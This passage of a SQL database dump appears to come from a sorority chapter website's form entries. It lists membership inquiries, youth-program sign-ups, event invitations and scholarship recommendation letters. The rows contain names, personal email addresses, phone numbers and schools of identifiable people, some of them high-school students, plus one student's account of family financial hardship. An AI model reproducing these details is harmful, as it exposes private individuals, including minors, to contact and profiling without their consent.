School'),(714,91,2,5,'12'),(715,91,2,6,'14'),(716,91,2,7,'N/A'),(717,92,2,1.3,'Olivia'),(718,92,2,1.6,'Lumpkin'),(719,92,2,2,'lumpkinolivia@gmail.com'),(720,92,2,3,'(202) 367-0645'),(721,92,2,4,'Oakland Mills High School'),(722,92,2,5,'12'),(723,92,2,6,'14'),(724,92,2,7,'N/A'),(725,93,2,1.3,'Diamonique'),(726,93,2,1.6,'Hoppin'),(727,93,2,2,'diamoniquejoy@yahoo.com'),(728,93,2,4,'Reservoir High School'),(729,93,2,5,'11'),(730,93,2,6,'12'),(731,93,2,7,'N/A'),(732,94,2,1.3,'Emily'),(733,94,2,1.6,'Smith'),(734,94,2,2,'mail4ecs@yahoo.com'),(735,94,2,3,'(301) 655-4226'),(736,94,2,4,'Atholton High School'),(737,94,2,5,'12'),(738,94,2,6,'6'),(739,94,2,7,'N/A'),(740,95,2,1.3,'Sierra'),(741,95,2,1.6,'Brown'),(742,95,2,2,'sierrab1234@icloud.com'),(743,95,2,4,'Reservoir High School'),(744,95,2,5,'12'),(745,95,2,6,'18'),(746,95,2,7,'N/A'),(747,96,1,1.3,'Christy'),(748,96,1,1.6,'Vinson'),(749,96,1,2,'csimmonsvinson@verizon.net'),(750,96,1,6,'(410) 365-3163'),(751,96,1,5,'Graduate'),(752,96,1,3,'Hi, my name is Christy Simmons Vinson and I live in Marriottsville, Maryland. I\'m interested in finding out more about your organization. Please contact me.  Thanks'),(753,97,1,1.3,'ZSun-nee'),(754,97,1,1.6,'Matema'),(755,97,1,2,'zsunrise3@yahoo.com'),(756,97,1,6,'(301) 257-0003'),(757,97,1,5,'Graduate'),(758,97,1,3,'I pledged Zeta Phi Bet-Alpha Chapter and never joined the graduate chapter. I now live in Hagerstown, MD. It seems this is the closest chapter. I have been without the sisterhood for many years and would love to attend the events and become involved.  My name when I pledged was Annette K. Miller.  I now use my performing name.I recently learned that my family history relates to the establishment of Greek organizations for African Americans.This has renewed my faith that my work with the Zetas is clearly not over.'),(759,98,2,1.3,'Vianna'),(760,98,2,1.6,'Curry'),(761,98,2,2,'mushynugget1973@yahoo.com'),(762,98,2,3,'(301) 693-0715'),(763,98,2,4,'Frederick HS'),(764,98,2,5,'12'),(765,98,2,6,'4'),(766,98,2,7,'N/A'),(767,99,1,1.3,'Cortnie'),(768,99,1,1.6,'Fisher'),(769,99,1,2,'fisher.cortnie@yahoo.com'),(770,99,1,6,'(734) 430-2976'),(771,99,1,5,'Transfer'),(772,99,1,3,'Greetings Sorors,\r\n\r\nI hope that this message finds you all well. My name is Cortnie Fisher and I’m fairly new to the DMV area – I just relocated to Columbia in March, but to MD back in September. I’m reaching out as I am in search of a chapter to transfer into. I am, originally, a Michigan Zeta belonging to Zeta Nu Zeta of Inkster, MI; and a former visiting soror with Iota Zeta chapter of Indianapolis, IN – which both my mother and sister belong to. I would love the opportunity to visit in meeting the Sorors of your Lambda Gamma Zeta and in learning of any events or service opportunities that you all have coming up. I can be reached at (734) 430-2976 or fisher.cortnie@yahoo.com. I really hope to hear from you all soon.\r\n\r\nThank you so much for your time.\r\n \r\nSisterly,\r\n \r\nCortnie Fisher\r\nfisher.cortnie@yahoo.com\r\n(734) 430-2976'),(773,100,1,1.3,'Aditya'),(774,100,1,1.6,'Coston'),(775,100,1,2,'adityacoston@yahoo.com'),(776,100,1,6,'(302) 494-7645'),(777,100,1,5,'Reclaim'),(778,100,1,3,'Hello Sorors! I would like information about the chapter and meetings. I moved to Columbia in 2008 and was reclaimed to Beta Zeta chapter. However, I have not been financial  since before 2011 and I am interested in becoming active.  I would appreciate any info you could provide.  Thank you!\r\n\r\nAditya McDuffy Coston (formerly Aditya McDuffy)\r\nInitiated Alpha Chapter Spring 1989'),(779,101,1,1.3,'Rose'),(780,101,1,1.6,'Matthews'),(781,101,1,2,'Rgmatthews@outlook.com'),(782,101,1,6,'(301) 825-4201'),(783,101,1,5,'Graduate'),(784,102,1,1.3,'Rose'),(785,102,1,1.6,'Matthews'),(786,102,1,2,'Rgmatthews@outlook.com'),(787,102,1,6,'(301) 825-4201'),(788,102,1,5,'Graduate'),(789,102,1,3,'Hello,\r\nI am inquiring about being included on the contact list for some of the organizations upcoming activities. I am not currently a member of Zeta Phi Beta but I am interested in possibly becoming a graduate member. I would like to, if possible, attend some of your functions and potentially volunteer some of my time to see if I would be a good fit.  \r\n\r\nI am currently a graduate student and a full time employee at the United States Copyright Office. I graduated with my M.B.A in 2012 with a 3.44 GPA from Walden University, and I am currently enrolled with the Fischler School of Education at NOVA South Eastern University for my Masters of Speech Pathology. \r\nI have a sincere passion mentoring, music, helping disadvantage/disabled children and motivational speaking.  I would love to share more about my interest and learn more about Zeta Phi Beta’s Lambda Gamma Zeta chapter.  \r\n\r\nMy contact information is below and I hope to hear from you soon. \r\nRespectfully, \r\nRose A. Matthews, MBA\r\n(301)825-4201\r\nrgmatthews@outlook.com'),(790,103,1,1.3,'A. Kemba'),(791,103,1,1.6,'Gilmore'),(792,103,1,2,'amagilmore@gmail.com'),(793,103,1,6,'(571) 315-5776'),(794,103,1,5,'Graduate'),(795,103,1,3,'Hello,\r\nI am interested in being considered for membership. When you have a moment, please contact me with any additional information.\r\n\r\nWarm Regards,\r\nA. Kemba Gilmore'),(796,104,1,1.3,'Marlene'),(797,104,1,1.6,'Jackson'),(798,104,1,2,'lechicmodels@outlook.com'),(799,104,1,6,'(410) 530-4876'),(800,104,1,5,'Other'),(801,104,1,3,'Good Morning\r\n\r\nIt was a pleasure meeting your representatives during your prom dress giveaway at the Ridgeley Run Community Center last Spring .   Thank you for your consideration of loaning our model\'s dresses for our upcoming fashion.  \r\n\r\nMy church will be sponsoring a fashion production from 1:00PM -4:30PM on September 26, 2015 at the Holiday Inn in Jessup MD. \r\n\r\nWe would love an opportunity to borrow approximately 10 formal prom dresses for our girls of very modest means.  Provided below is a list of our model\'s dress sizes\r\n\r\nIn exchange, we will be happy to provide you with a free ad in our program book, website, and Facebook page.\r\n\r\nI will be happy to email you our latest newsletter and flyer for more information.  Please also feel free to visit us at www.lechicacademy.com.  Also, see our 2014 fashion show at YouTube/LeChic Academy..\r\n\r\nAny assistance you can provide will be great appreciated by our young ladies. \r\n\r\nPlease feel free to contact me to discuss the details.\r\n\r\nThank you,\r\n\r\nDr. Marlene Jackson'),(802,105,1,1.3,'Morgan'),(803,105,1,1.6,'Rone'),(804,105,1,2,'mrone@stevenson.edu'),(805,105,1,6,'(443) 468-6961'),(806,105,1,5,'Graduate'),(807,105,1,3,'Good Afternoon,\r\n\r\nI am interested in pursuing a membership in Zeta Phi Beta Sorority, Inc. I received my bachelor\'s degree in Business Information Systems from Stevenson University in December 2014 at the young age of 20 and I am currently working on my master\'s degree in Computer Forensics at Stevenson as well. Could you provide me with more information about pursuing a membership?\r\n\r\nThank you,\r\nMorgan Rone'),(808,106,1,1.3,'Craig'),(809,106,1,1.6,'Allen'),(810,106,1,2,'craigall-11@msn.com'),(811,106,1,6,'(410) 448-0228'),(812,106,1,5,'Other'),(813,106,1,3,'Greetings Ladies,\r\n \r\nI hope all is well. Would please be so kind and distribute this information  to all members of your  chapter.  We are now accepting applications for the 2015-16 Beautillion Class. If members know a high school male junior or senior in the Baltimore Area and surrounding counties have them apply online  using the information posted below.\r\n \r\nBrother Craig  Allen\r\n \r\n\r\nAPPLICATION DEADLINE IS FRIDAY OCTOBER 2nd, 2015!\r\n \r\n The following information to your fellow BGLO chapter members, social and civic organizations, guidance counselors or any high school male senior or junior who lives in Baltimore City or the surrounding counties.\r\n \r\n Applications for the Fourteenth Class of Delta Lambda\'s Beautillion Scholars Program are now available ONLINE at www.deltalambda.org. We are no longer providing hard-cop...y applications.\r\n\r\nOur program centers around young minority men who are 11th or 12 grade students and have demonstrated strong academic and leadership potential as well as those who need additional guidance and support during their journey to manhood. We believe that both have a capacity to be successful but only with the right mentoring.\r\n \r\n We are seeking your assistance and ask that you support our efforts by forwarding the application links to family members, friends, colleagues and church members. Our qualifications are: \r\n•1 A male in the 11th OR 12th grade for the 2015-16 academic year;\r\n•2 Interested in attending college;\r\n•3 Demonstrates leadership ability;\r\n•4 Involved in extra-curricular activities; and/or\r\n•5 Need just a little bit more guidance and support along the journey to manhood.\r\n Additionally we have planned a thorough interview process and orientation session designed to familiarize each applicant and his parents with our mission. \r\n \r\n APPLICATION DEADLINE: 5PM on Friday, October 2nd. \r\n \r\n Encourage your candidate to apply using our ONLINE APPLICATION, by copying and pasting the following link to their web browser: \r\n 11th Grade: http://wp.me/P2T9GC-dPR\r\n 12th Grade: http://wp.me/P2T9GC-46P\r\n We thank you in advance for the interest shown and the assistance given on our behalf.\r\n \r\n Sincerely,\r\n Bro. Antoine Banks\r\n Chairman\r\n Beautillion Scholars Program Committee\r\n Delta Lambda Chapter\r\n Alpha Phi Alpha Fraternity, Inc.\r\n eMail: beautillion@deltalambda.org\r\n Phone: (410) 921-6876'),(814,107,1,1.3,'Natisha'),(815,107,1,1.6,'Willis'),(816,107,1,2,'natishawillis@gmail.com'),(817,107,1,6,'(410) 245-2055'),(818,107,1,5,'Reclaim'),(819,107,1,3,'Greetings Sorors -\r\nMy name is Natisha Willis from Nu Delta, University of Illinois, Fall 2003. \r\n\r\nI have not been active in quite some time, but I currently reside in Columbia, MD and would like information on the next service project if at all possible. \r\n\r\nThanks so much!\r\n\r\nIn your service,\r\nNatisha'),(820,108,1,1.3,'Alicia'),(821,108,1,1.6,'Friend'),(822,108,1,2,'aliciafriend@aol.com'),(823,108,1,6,'(410) 540-9407'),(824,108,1,5,'Other'),(825,108,1,3,'I would like information on how high school seniors can apply for the W. Ruth Conway Scholarship and the award amount.\r\n\r\nThank-you!'),(826,109,1,1.3,'Dawnielle'),(827,109,1,1.6,'Eldridge'),(828,109,1,2,'dawnielle.eldridge@gmail.com'),(829,109,1,6,'(240) 593-9339'),(830,109,1,5,'Graduate'),(831,109,1,3,'I am interested in this chapter.'),(832,110,1,1.3,'Kalima'),(833,110,1,1.6,'Alawode'),(834,110,1,2,'mzalawode@yahoo.com'),(835,110,1,6,'(609) 731-9429'),(836,110,1,5,'Transfer'),(837,110,1,3,'Greetings,\r\nI am looking to explore a different Graduate Chapter here in Maryland. I am currently a member of Tau Omega Zeta of Towson, MD. I am registered in Zeta under my maiden name Kalima Roberts. I would like to attend one of your Chapter Meetings and would like to attend any of your upcoming community service events. Please feel free to contact me via email at mzalawode@yahoo.com or via phone at 609-731-9429.\r\nThank you in advance for your consideration.\r\nSisterly, \r\nKalima Alawode'),(838,111,1,1.3,'Angela'),(839,111,1,1.6,'Jefferson'),(840,111,1,2,'angela_jefferson@hotmail.com'),(841,111,1,6,'(443) 414-5779'),(842,111,1,5,'Transfer'),(843,111,1,3,'Good evening Sorors,\r\nI\'m presently financial and active but am looking to transfer to a new chapter. I would like to attend a chapter meeting and some community service events that you are doing to meet and get a feel for the chapter.'),(844,112,1,1.3,'La Toya'),(845,112,1,1.6,'Smith-Butler'),(846,112,1,2,'mrsbutler2012@gmail.com'),(847,112,1,6,'(912) 220-8455'),(848,112,1,5,'Seeking Membership'),(849,112,1,3,'Hello,\r\n\r\nMy name is La Toya Smith-Butler and I am interested in membership in Zeta Phi Beta Sorority, more specifically Lambda Gamma Zeta chapter. I have been living in Maryland for two years now and have had an interest in joining Zeta Phi Beta for years. I wanted to reach out to this chapter as I have visited several chapters and I am trying to make an informed decision about joining and possibly being accepted in this organization.\r\n\r\nThank you,\r\n\r\nLa Toya Smith-Butler'),(850,113,1,1.3,'Samonne'),(851,113,1,1.6,'Whitehead'),(852,113,1,2,'s.whitehead45@gmail.com'),(853,113,1,6,'(443) 261-8837'),(854,113,1,5,'Other'),(855,113,1,3,'Good Afternoon, \r\n\r\nMy name is Samonne Whitehead I attend college, but I want to do more community service and network with other organization. I was wondering dose your chapter let students volunteer with you guys. If so can you send me information about volunteer dates ?'),(856,114,1,1.3,'Lisa'),(857,114,1,1.6,'Harris'),(858,114,1,2,'lisajharris27@gmail.com'),(859,114,1,6,'(703) 587-6139'),(860,114,1,5,'Reclaim'),(861,114,1,3,'Hello Sorors,\r\n\r\nI am interested in becoming an active member and finding a grad chapter that\'s a good fit for me.  Please provide me more information about the reclamation process and when I am able to attend a chapter meeting. \r\n\r\nSisterly,\r\nLisa J. Harris'),(862,115,1,1.3,'Shakala'),(863,115,1,1.6,'Bentley'),(864,115,1,2,'scorpiobird22@yahoo.com'),(865,115,1,6,'(803) 457-2331'),(866,115,1,5,'Seeking Membership'),(867,115,1,3,'Hello. I am interested in becoming a member of this great sorority. I am in the Army station on FT Jackson. What are the requirements?'),(868,116,1,1.3,'KRISTIN'),(869,116,1,1.6,'CLARK'),(870,116,1,2,'clark27_1982@yahoo.com'),(871,116,1,6,'(240) 432-8540'),(872,116,1,5,'Seeking Membership'),(873,117,1,1.3,'Quinton'),(874,117,1,1.6,'Askew'),(875,117,1,2,'qaskew@howardcountymd.gov'),(876,117,1,6,'(410) 313-0220'),(877,117,1,5,'Other'),(878,117,1,3,'Good morning,\r\n\r\nMy name is Quinton Askew, Director of the Howard County MultiService Center.  I and sending this inquiry in reference to your Chapter partnering with our Center and specifically, our Getting Ahead (GA) graduate program.  The Getting Ahead program is twofold, it provides a framework to organizations to better serve those in need as well as providing workshops to low income residents in the community to assist in goal setting and obtaining needed resources.\r\n\r\nThe most important part of our Getting Ahead program is the graduates and next steps, we call Staying Ahead.  The GA graduates look forward to becoming a productive member of their community and connecting with others who can provide a positive impact on their lives.  We are seeking to have various professional groups partner with us to attend the graduates social (networking) events that are held quarterly to connect with graduates, provide positive support and possibly mentoring/coaching relationships.\r\n\r\nI would like to discuss more opportunities with someone to give a better overview of our programs and partnership opportunities.'),(879,118,1,1.3,'Taiya'),(880,118,1,1.6,'McClamy'),(881,118,1,2,'iamladypitbull@gmail.com'),(882,118,1,6,'(716) 310-5888'),(883,118,1,5,'Seeking Membership'),(884,118,1,3,'I am seeking membership. I am relocating to the Baltimore area and would like to participate in events within the area.'),(885,119,1,1.3,'Celeste'),(886,119,1,1.6,'Taylor'),(887,119,1,2,'celesteatchurch@gmail.com'),(888,119,1,6,'(443) 475-0412'),(889,119,1,5,'Other'),(890,119,1,3,'I am the Event Coordination Manager for HandbagsUlike. I have been unable to process payment for the Denim &amp; Pearls event. The contract has been sent, but I just need to make the payment.\r\n\r\nThanks so much,\r\nCeleste'),(891,120,1,1.3,'Tommia'),(892,120,1,1.6,'Hayes'),(893,120,1,2,'tommia.hayes1108@gmail.com'),(894,120,1,6,'(202) 903-6207'),(895,120,1,5,'Seeking Membership'),(896,120,1,3,'Hello Ladies of Zeta Phi Beta,\r\n\r\nAfter extensively looking over your website and seeing you women in the community I wanted to follow up and learn more about joining your sisterhood? As a volunteer for a cancer organization it is my mission to help other young women and men not to lose a parent to cancer like I recently did. \r\n\r\nAlso, mentoring young adults and help groom to show them they can be more than their environment is my passion! My mentee is currently in her junior year in college while I\'m currently in my last semester in graduate school. \r\n\r\nIt would be my honor to join your sisterhood and help spread your mission in the community and grow my network of strong sisters like! yourselves. \r\n\r\nI hope to hear from you soon\r\n\r\nBest,\r\nTommia Hayes'),(897,121,1,1.3,'Tommia'),(898,121,1,1.6,'Hayes'),(899,121,1,2,'tommia.hayes1108@gmail.com'),(900,121,1,6,'(202) 903-6207'),(901,121,1,5,'Seeking Membership'),(902,121,1,3,'Hello Ladies of Zeta Phi Beta,\r\n\r\nAfter extensively looking over your website and seeing you women in the community I wanted to follow up and learn more about joining your sisterhood? As a volunteer for a cancer organization it is my mission to help other young women and men not to lose a parent to cancer like I recently did. \r\n\r\nAlso, mentoring young adults and help groom to show them they can be more than their environment is my passion! My mentee is currently in her junior year in college while I\'m currently in my last semester in graduate school. \r\n\r\nIt would be my honor to join your sisterhood and help spread your mission in the community and grow my network of strong sisters like! yourselves. \r\n\r\nI hope to hear from you soon\r\n\r\nBest,\r\nTommia Hayes'),(903,122,1,1.3,'Tammy'),(904,122,1,1.6,'medlin'),(905,122,1,2,'medlint1@gmail.com'),(906,122,1,6,'(410) 777-0621'),(907,122,1,5,'Seeking Membership'),(908,122,1,3,'Greetings,  \r\nI am interested in joining your organization and would like to have more information on how to proceed.'),(909,123,1,1.3,'Amy'),(910,123,1,1.6,'Upchurch'),(911,123,1,2,'amy.upchurch1998@gmail.com'),(912,123,1,6,'(410) 531-1843'),(913,123,1,5,'Other'),(914,123,1,3,'Hello,\r\n  My name is Amy Upchurch and I received your information from Dr. Burnett at Glenelg High School.  He informed me that your sorority may provide support with prom dresses.  Unfortunately, my family has endured some significant hardships this past year and it has created financial stress.  I wanted to find out if you are helping with prom dresses again this year and find out if there were things I could do to be considered.  It is my senior year.\r\nThanks\r\nAmy'),(915,124,1,1.3,'Demetria'),(916,124,1,1.6,'Richardson'),(917,124,1,2,'richardsondeme@gmail.com'),(918,124,1,6,'(240) 386-9765'),(919,124,1,5,'Other'),(920,124,1,3,'Greetings\r\n My name is Demetria Richardson. I am a graduate student at Bowie State University. The purpose of contact is to inform you of Bowie State’s Bike Tour and invite your organization to be apart of the event. Last year, the Bowie Metropolitan Alumni Chapter (BMAC) in partnership with Bowie State University (BSU) hosted its First Annual BSU Bike Tour. It was an official event for BSU’s 150th Sesquicentennial Celebration and a huge success with nearly 250 registrants and over 100 volunteers. The tour was the first ever for BSU and also for any Historically Black College and University (HBCU). Its primary purpose is to raise funds for BSU’s Scholarship Foundation and to give back to other designated community charities.\r\n We want to invite your organization to support our bike tour with an endorsement. We would greatly appreciate you announcing our event at your next chapter meeting, publishing this event on your activity calendar and your social media outlets.\r\n Our second annual event will occur on Saturday, September 10, 2016. It will start and end on BSU’s campus at 14000 Jericho Park Road, Bowie, Maryland. The planned distances are 20, 46, and 65 mile routes that will extend primarily through Prince George’s and Anne Arundel County. Each route is fully supported with rest stops that are equipped with healthy snacks and drinks, ride marshals, and support and gear (SAG). Our host cycling clubs are “Getting It In Cycling” and “PHASE Cycling.” Last year, we had cycling groups from all over the DMV area; along with members of the Divine Nine.\r\n We are looking forward to hearing from you and the opportunity to include your illustrious organization as a supporter of the BSU Bike Tour.\r\n Come join the fun!\r\n Demetria Richardson'),(921,125,1,1.3,'Erin'),(922,125,1,1.6,'Tolbert'),(923,125,1,2,'erindiane.tolbert@gmail.com'),(924,125,1,6,'(240) 592-5337'),(925,125,1,5,'Seeking Membership'),(926,125,1,3,'Good Evening,\r\n\r\n\r\n     I hope this email finds you in good spirits. My name is Erin Tolbert and I am interested in learning more about how I can be invited to become a member of Zeta Phi Beta Sorority, Incorporated.\r\n     Since I was a young child I have been very active in my local community.  Although my college did not offer any Greek organizations, I was still active in community service throughout my entire matriculation and even started my own on campus non-profit geared towards young female artists who serve the community through the creative arts.\r\n   Now that I have graduated, I am interested in becoming apart of a sorority that is dedicated to molding finer women who are dedicated to selflessly serving their communities. Zeta Phi Beta Sorority, Incorporated embodies the type of characteristics and service I possess and wish to be associated with. If you have any information about what I should do in order to seek membership, please let me know.\r\n\r\n God bless!\r\n\r\n\r\n\r\n\r\n\r\n Sincerely,\r\n\r\n\r\n Erin Tolbert'),(927,126,1,1.3,'Dawnielle'),(928,126,1,1.6,'Eldridge'),(929,126,1,2,'Dawnielle.eldridge@gmail.com'),(930,126,1,6,'(240) 593-9339'),(931,126,1,5,'Seeking Membership'),(932,127,1,1.3,'Melaine'),(933,127,1,1.6,'Lee'),(934,127,1,2,'kickball@nacacdst.org'),(935,127,1,6,'(410) 551-9576'),(936,127,1,5,'Other'),(937,127,1,3,'Inline image 1\r\n \r\nMay 2016\r\n \r\nGreetings!\r\n \r\nYou are hereby invited to participate in the 2016 “Kick-off to Summer” Kickball Tournament and Wellness Day, sponsored by North Arundel County Alumnae Chapter (NACAC) of Delta Sigma Theta Sorority, Incorporated on Saturday, June 4, 2016 at Matthewstown Harmans Park, 7605 Ridge Chapel Road, Hanover, MD 21076.  Time: 10 a.m. to 3 p.m.\r\n \r\nDelta Sigma Theta is a public service sorority whose chapters serve communities under a Five-Point Programmatic Thrust which includes Educational Development, Economic Development, International Awareness and Involvement, Political Awareness and Involvement and Physical and Mental Health.  The NACAC Kickball Tournament and Wellness Day will emphasize the importance of physical activity as a boost to physical and mental well-being.\r\n \r\nThere are two ways that you, your colleagues, family, fiends and neighbors can participate in this fundraising event for the public service programs of NACAC. You can Create-A-Team or Donate On-Line.  Here’s how.\r\n \r\nTo Create-A-Team: \r\n1)      Organize a team of 8-10 players. Select a captain. Each team will play in round-robin style throughout the day from 10 a.m. to 3 p.m.\r\n2)      Complete the waiver form attached\r\n3)      Submit a $15 registration fee for each player on your team by May 27, 2016\r\n4)      Invite everyone you know to support your team\r\n5)      Concessions will be provided\r\n \r\nSubmit team payments online via Kickball Day, http://www.nacacdst.org/Kickball.html and select “Add to Cart.”\r\n \r\nTo Donate On-Line: If you prefer to make a monetary donation, visit the “Kickball Day” site at http://www.nacacdst.org/Kickball.html and select the “donate.”\r\n \r\nWe look forward to hearing from you and we hope to see you on the field! Please feel free to contact us at kickball@nacacdst.org for more information or if you have any questions.\r\n \r\n \r\nSincerely,\r\n \r\nJeanne D. Cooper\r\nChapter President\r\n \r\nMoniqua Roberts\r\nKickball Committee Co-Chair\r\n \r\nSharon Mooney\r\nKickball Committee Co-Chair\r\n \r\nMelaine Lee\r\nKickball Committee Co-Chair'),(938,128,1,1.3,'Joy'),(939,128,1,1.6,'Belle'),(940,128,1,2,'bellejbelle@gmail.com'),(941,128,1,6,'(443) 875-2971'),(942,128,1,5,'Transfer'),(943,128,1,3,'Greetings Sorors,\r\nI work with Soror Kalima Roberts and was encouraged to reach out regarding membership. I am seeking to become financial and active again and would love to visit the chapter if allowed. I came through 2005 Delta Beta Zeta chapter.\r\n\r\nSisterly,\r\nSoror Joy Belle'),(944,129,1,1.3,'Dawnielle'),(945,129,1,1.6,'Eldridge'),(946,129,1,2,'dawnielle.eldridge@gmail.com'),(947,129,1,6,'(240) 593-9339'),(948,129,1,5,'Seeking Membership'),(949,130,1,1.3,'Ashley'),(950,130,1,1.6,'Williams'),(951,130,1,2,'anwilliams0718@gmail.com'),(952,130,1,6,'(443) 593-8319'),(953,130,1,5,'Seeking Membership'),(954,130,1,3,'Hello, I am Ashley Williams and I am interested in your organization. I would like to know when the next informational session or event will be. \r\n\r\nThank you so much!'),(955,131,1,1.3,'Shomara'),(956,131,1,1.6,'Reyes'),(957,131,1,2,'shomara.reyes@gmail.com'),(958,131,1,6,'(704) 806-3749'),(959,131,1,5,'Transfer'),(960,131,1,3,'My name is Shomara Reyes and I have recently relocated to Gaithersburg.  I am interested in visiting your chapter and attending some events in an attempt to transfer my membership from NC to a chapter closer to me.\r\n\r\nI am a current member of the Alpha Alpha Zeta chapter in Salisbury, NC. I look forward to your response and visiting with the Sorors of this chapter.\r\n\r\nSisterly,\r\n\r\nSoror Shomara Reyes'),(961,132,1,1.3,'Shomara'),(962,132,1,1.6,'Reyes'),(963,132,1,2,'shomara.reyes@outlook.com'),(964,132,1,6,'(704) 806-3749'),(965,132,1,5,'Transfer'),(966,132,1,3,'My name is Shomara Reyes and I have relocated to Gaithersburg, MD.  I am interested in visiting your chapter and attending some events in an attempt to transfer my membership from NC to a chapter closer to me.\r\n\r\nI am a current member of the Alpha Alpha Zeta chapter in Salisbury, NC. I look forward to your response and visiting with the Sorors of this chapter.'),(967,133,1,1.3,'Adrienne'),(968,133,1,1.6,'Brown'),(969,133,1,2,'loveadb@yahoo.com'),(970,133,1,6,'(410) 615-8277'),(971,133,1,5,'Reclaim'),(972,133,1,3,'Hello Sorors.\r\nI have been inactive for a long time and am interested in attending a meeting. I met a sorority at the college fair at Long Reach High School recently and she encouraged me to reach out.\r\nLooking forward to hearing someone. Thanks.'),(973,134,1,1.3,'Tina'),(974,134,1,1.6,'Thompson'),(975,134,1,2,'tthompson517@gmail.com'),(976,134,1,6,'(215) 839-5048'),(977,134,1,5,'Other'),(978,134,1,3,'I have never pledge, but I would like to join the graduate chapter'),(979,135,1,1.3,'Bianca'),(980,135,1,1.6,'Mayo'),(981,135,1,2,'bmayo0425@gmail.com'),(982,135,1,6,'(443) 743-9121'),(983,135,1,5,'Seeking Membership'),(984,136,1,1.3,'NICOLE'),(985,136,1,1.6,'KELLY'),(986,136,1,2,'NIKKELLY73@GMAIL.COM'),(987,136,1,6,'(443) 949-2008'),(988,136,1,5,'Seeking Membership'),(989,137,4,5.3,'Crystal'),(990,137,4,5.6,'Whitaker'),(991,137,4,2,'pr@zphiblgz.org'),(992,137,4,6,'Testing this out'),(993,138,6,18.3,'Diandra'),(994,138,6,18.6,'Eason'),(995,138,6,19.1,'123 ABC Street'),(996,138,6,19.3,'Jamaica'),(997,138,6,19.4,'NY'),(998,138,6,19.5,'21045'),(999,138,6,19.6,'United States'),(1000,138,6,4,'01-01-01'),(1001,138,6,21,'djny05@gmail.com'),(1002,138,6,20,'(123) 456-7890'),(1003,138,6,10,'Howard Community College'),(1004,138,6,9,'3.0'),(1006,138,6,12,'18'),(1007,138,6,14,'no'),(1008,138,6,13,'no'),(1208,155,6,18.3,'1'),(1209,155,6,18.6,'2'),(1210,155,6,19.1,'3'),(1211,155,6,19.3,'4'),(1212,155,6,19.4,'5'),(1213,155,6,19.5,'6'),(1214,155,6,19.6,'United States'),(1215,155,6,4,'11-10-1984'),(1012,139,7,1.3,'Crystal'),(1013,139,7,1.6,'Whitaker'),(1014,139,7,2,'pr@zphiblgz.org'),(1015,139,7,3,'Pearlette Club'),(1016,139,7,4,'Hello Sorors, \r\nI wanted to test this form out to make sure you will receive any youth requests. Can you please email me back once this is received. \r\n\r\nThank you!! \r\nSoror Whitaker'),(1017,140,8,1.3,'Jennifer'),(1018,140,8,1.6,'Nowell'),(1019,140,8,11,'JN Dimension of Guidance Counseling Services LLC'),(1020,140,8,12,'Therapist'),(1021,140,8,2,'jndimensionofguidance@gmail.com'),(1022,140,8,3,'Jalen Philogene'),(1023,140,8,4,'1 year'),(1024,140,8,5,'Other'),(1025,140,8,6,'Therapist'),(1026,140,8,7,'Excellent'),(1027,140,8,9,'Average'),(1028,140,8,8,'Excellent'),(1029,140,8,14,'To the Admission Department:\r\nI am pleased to recommend Jalen Philogene for admission into your college/university, I worked with Jalen and his mother on assessing he aptitude, abilities, interest, and personality for post-secondary education. During that time, I have come to know him as a strong student and a role model for his peers.\r\nJalen is a rare type of student who combines exceptional natural ability with a willingness and eagerness to learn. Jalen can help his peers with difficult mathematical concepts because he is great with critical thinking and numbers. Although he is aware of his natural ability in mathematics, Jalen is constantly challenging and setting future goals for himself. He is part of the extracurricular activities, which challenges him to expand on his social skills and prepare for the college/university student life. \r\nJalen would make an excellent candidate for early admissions. I recommend him without hesitation. Should you have any questions, please feel free to contact me at (202) 630-0126 or email jndimensionofguidance@<span class=\"oe_displaynone\">null</span>gmail.com. \r\n\r\n\r\nSincerely,\r\nJennifer Nowell, MA, CRC, LPC\r\nCertified Rehabilitation Counselor &License Professional Counselor\r\nJN Dimension of Guidance Counseling Services, LLC.'),(1030,140,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/02/College-Recommendation.docx'),(1031,140,8,16,'Highly recommended'),(1032,141,8,1.3,'Linda'),(1033,141,8,1.6,'Packman'),(1034,141,8,11,'Reservoir High School'),(1035,141,8,12,'School Counselor'),(1036,141,8,2,'linda_packman@hcpss.org'),(1037,141,8,3,'Alexandra Alston'),(1038,141,8,4,'four years'),(1039,141,8,5,'Advisor/Counselor'),(1040,141,8,7,'Excellent'),(1041,141,8,9,'Excellent'),(1042,141,8,8,'Excellent'),(1043,141,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/02/CounselorLetterofRecommendationforAlexandraAlstonscholarship.docx'),(1044,141,8,16,'Highly recommended'),(1045,142,8,1.3,'Kasey'),(1046,142,8,1.6,'Quinn'),(1047,142,8,11,'Hammond High'),(1048,142,8,12,'School Counselor'),(1049,142,8,2,'kasey_quinn@hcpss.org'),(1050,142,8,3,'Seth Ragin'),(1051,142,8,4,'2.5 years'),(1052,142,8,5,'Advisor/Counselor'),(1053,142,8,7,'Excellent'),(1054,142,8,9,'Excellent'),(1055,142,8,8,'Excellent'),(1056,142,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/02/Ragin-Seth-Scholarship.docx'),(1057,142,8,16,'Highly recommended'),(1058,143,8,1.3,'Allison'),(1059,143,8,1.6,'Tullier'),(1060,143,8,11,'Oakland Mills High School'),(1061,143,8,12,'Mathematics Teacher'),(1062,143,8,2,'allison_tullier@hcpss.org'),(1063,143,8,3,'Oluwaseun Showunmi'),(1064,143,8,4,'three years'),(1065,143,8,5,'Teacher/Professor'),(1066,143,8,7,'Excellent'),(1067,143,8,9,'Excellent'),(1068,143,8,8,'Excellent'),(1069,143,8,15,'https://zphiblgz.org/wp-content/uploads/gravity_forms/8-2ec429283182b0327184423c694c72d5/2018/02/Oluwaseun-reccomendation.docx'),(1070,143,8,16,'Highly recommended'),(1071,144,7,1.3,'Sontia'),(1072,144,7,1.6,'Daniels'),(1073,144,7,2,'jordanmichel23@yahoo.com'),(1074,144,7,3,'Amicette Club'),(1075,144,7,4,'I am a soror from Tau Delta Zeta and i currently live in Howard county. I am looking for a youth group for my daughter Madison Michel (11) .  She is a 6th grader at Bonnie Branch Middle school and was a former girl scout and cheerleader.'),(1076,145,8,1.3,'Bailey'),(1077,145,8,1.6,'Leuschen'),(1078,145,8,11,'Girl Up,  United Nations Foundation'),(1079,145,8,12,'Programs and Impact Manager'),(1080,145,8,2,'bzleuschen@gmail.com'),(1081,145,8,3,'Marie 